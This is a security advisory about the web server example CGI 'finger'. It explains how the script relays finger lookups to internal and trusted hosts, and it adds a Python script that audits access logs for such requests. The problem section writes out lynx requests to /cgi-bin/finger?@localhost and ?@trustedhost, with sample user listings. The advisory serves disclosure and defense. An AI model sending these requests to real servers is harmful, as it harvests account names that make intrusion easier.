COMMAND

    finger.cgi

SYSTEMS AFFECTED

    Systems running any WWW server which includes the example CGI
    program "finger".

PROBLEM

    The following info is based on Corinne Posse Security Notice
    Issue 2.

    Finger, the standard Unix command used to look up users on a
    system, has been deemed a security hole by some sites and in some
    cases shut off. Other variations of finger have been altered so
    that a user can control exactly what information about his/her
    login is shared on the local machine and over the wire. In other
    instances, tcpwrappers are used so that only trusted systems on a
    LAN can finger other machines. Having the CGI program "finger"
    installed can breach security in all these instances, because the
    lookup is then made by the web server host on behalf of the remote
    visitor.

    Finger a site on the net, out of the blue.

        [user@mybox] finger @host.i.want.to.own.com

        /////////////////////////////////////////////////
        *
        * WARNING: Your finger attempt from user@myhost
        * has been recorded in our logs.
        * Any more finger attempts from your host, and
        * we will consider those actions an attack on
        * our host. We will prosecute anyone we feel is
        * intruding onto our network.
        *
        /////////////////////////////////////////////////

        [user@mybox] lynx http://host.i.want.to.own.com/cgi-bin/finger?@localhost

        [localhost.i.want.to.own.com]
        Login    Name                 Tty  Idle  Login Time   Office Office Phone
        lip      Larry I. Peters       qf     -  Feb 19 15:01
        jack     Jack Daniels          pd 23:40  Feb 18 14:44
        jdobman  J. Doberman           p1     3  Feb 19 12:32 Room 101
        jdobman  J. Doberman           q1  2:48  Feb  9 15:57 Room 101
        red      R. Earl Davies       *q5  1:26  Feb 19 08:43

    With that one CGI program, an entire network's security has been
    violated. Imagine that host.i.want.to.own.com has a machine
    specifically for processing orders. Knowing a username on that
    machine makes it a lot easier for a potential hacker to get in.
    If software such as tcpwrappers is in use on the LAN, chances
    are it will be configured so that local users can see who is
    logged in where.

        [user@mybox] lynx http://host.i.want.to.own.com/cgi-bin/finger?@trustedhost

        [trustedhost]
        Login    Name                 Tty  Idle  Login Time   Office Office Phone
        lip      Larry I. Peters       q1     -  Feb 19 15:01
        jack     Jack Daniels          p0  1:40  Feb 18 14:44

    Now, an entire network has had a security breach, not just one
    system.

SOLUTION

    Most people have no real use for /cgi-bin/finger, so the easiest
    way to take care of this problem is to remove the script.
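
    To check whether the script has already been requested this way,
    the web server's access log can be audited. The following is an
    added example, not part of the original notice: it assumes Common
    Log Format and the /cgi-bin/finger path shown above, and the
    function name and sample log lines are constructed for
    illustration.

```python
import re
from urllib.parse import unquote

# Common Log Format: host ident user [time] "METHOD target PROTO" status size
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')

def audit_finger_cgi(lines, cgi_path="/cgi-bin/finger"):
    """Return one finding per logged request that reached the finger CGI.

    kind is 'relay' when the query names a host (@host or user@host), i.e.
    the web server was asked to finger on the requester's behalf; otherwise
    it is 'local' (a plain user lookup on the web server itself).
    """
    findings = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not a CLF line; ignore
        client, when, _method, target, status = m.groups()
        path, _, query = target.partition("?")
        if unquote(path).rstrip("/") != cgi_path:
            continue
        query = unquote(query)  # %40 is an encoded '@'
        user, at, host = query.partition("@")
        findings.append({
            "client": client, "time": when, "status": int(status),
            "kind": "relay" if at else "local",
            "finger_user": user, "finger_host": host,
        })
    return findings

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [19/Feb/1998:15:02:11 -0500] "GET /cgi-bin/finger?@localhost HTTP/1.0" 200 512',
    '192.0.2.10 - - [19/Feb/1998:15:03:40 -0500] "GET /cgi-bin/finger?%40trustedhost HTTP/1.0" 200 230',
    '198.51.100.7 - - [19/Feb/1998:15:05:02 -0500] "GET /index.html HTTP/1.0" 200 1043',
    '198.51.100.7 - - [19/Feb/1998:15:06:00 -0500] "GET /cgi-bin/finger?lip HTTP/1.0" 200 301',
]

if __name__ == "__main__":
    for f in audit_finger_cgi(SAMPLE):
        print(f["time"], f["client"], f["kind"],
              f["finger_user"] or "-", f["finger_host"] or "-", f["status"])
```

    A 'relay' finding with status 200 means the listing for the named
    host was returned to the client address shown.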